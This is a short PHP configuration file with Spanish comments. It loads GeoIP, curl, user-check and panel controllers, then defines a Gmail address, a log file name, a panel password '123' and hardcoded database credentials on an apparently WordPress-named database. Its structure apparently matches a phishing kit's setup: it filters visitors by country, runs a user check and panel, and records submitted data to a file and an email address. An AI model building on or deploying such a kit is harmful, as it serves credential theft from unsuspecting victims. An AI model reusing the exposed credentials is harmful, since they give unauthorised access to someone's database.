<?php
// INCLUYENDO HERRAMIENTAS
include 'library/tools.php';
//LIBERIA BROWSER
include 'library/browser.php';
//GEOIP LOCATION
require 'app/geoip/geoip2.phar';
use GeoIp2\Database\Reader;
//APLICANDO PAIS DE USUARIO
$reader = new Reader('app/geoip/dbip.mmdb');
//LIBRERIUA CUR
include 'library/dbase.php';
//LIBERIA CURL
include 'library/mycurl.php';
// CONFIGURACION DE RUTAS URL
include 'controller/checkuser.php';
include 'controller/vistas.php';
include 'controller/post.php';
include 'controller/panel.php';
//CORREO ELECTRONICO
define("correo", "venedictoxvi2025@gmail.com");
//NOMBRE DE ARCHIVO PARA GRABAR LOGOS
define("filename", "03945921340.html");
//VARIABLES CONSTANTES
define("clavepanel", "123");
//BASE DE DATOS
define("dbHost", "localhost");
define("dbUsername", "crealab_wp169");
define("dbPass", ".8S!I34pws");
define("dbname", "crealab_wp169");
//IP COUNTRY
$cip = new Tools();
define("country", $reader->country($cip->getip())->country->isoCode);